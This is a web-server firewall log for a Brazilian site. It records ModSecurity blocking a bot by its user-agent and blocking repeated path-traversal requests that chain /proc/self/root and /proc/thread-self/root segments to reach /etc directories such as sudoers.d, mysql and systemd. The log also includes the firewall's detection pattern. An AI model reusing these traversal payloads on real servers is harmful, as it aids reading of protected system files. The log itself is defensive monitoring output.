[Wed Mar 18 07:07:43.323521 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.244.43:58288] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp5bwkwaGbbGflqUZDo_QAAANY"]
[Wed Mar 18 07:07:43.869471 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:36362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5b9Y0UrI5A3LftIxyGwAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:07:45.133319 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.241.31:51098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5cSmAPhZkrhU8w4lFfgAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:07:49.596030 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:51108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5deoXxyEfFpUF8f9EcwAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:07:50.466891 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:38922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5dta6ubjKNq_cu4ZuggAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:08:09.218291 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:35426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5ieyqAr6etmhZHNqTcAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:08:12.572848 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:39292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5jMdf6f5d65gmYZSqSwAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:08:13.882337 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.243.128:39300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5jSmAPhZkrhU8w4lFhAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:08:16.115787 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:39312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5kOoXxyEfFpUF8f9EegAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:08:22.714988 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:39314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5luyqAr6etmhZHNqTdwAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:08:24.033169 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:52622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5mNa6ubjKNq_cu4ZuiQAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:08:28.676986 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:52636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5nNY0UrI5A3LftIxySQAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:08:50.166410 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:45934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5sta6ubjKNq_cu4ZuogAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:08:51.547564 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.243.128:51538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5symAPhZkrhU8w4lFiAAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:08:54.413587 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:43538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5ttY0UrI5A3LftIxyaAAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:08:56.099584 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:51552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5uOw_le52K8_3pV23uwAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:08:58.423488 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:51558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5usdf6f5d65gmYZSqUwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:09:10.183852 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:54124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5xta6ubjKNq_cu4ZusQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:09:51.951691 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:58386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp578df6f5d65gmYZSqiwAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:09:57.875075 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.241.31:41450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp59fu8EFLIOrSqIpvcxwAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:10:04.676358 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:38728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5_Pu8EFLIOrSqIpvczAAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:11:25.065464 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:38730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp6TeoXxyEfFpUF8f9FTAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:11:58.795967 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:58122] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp6buyqAr6etmhZHNqTxQAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
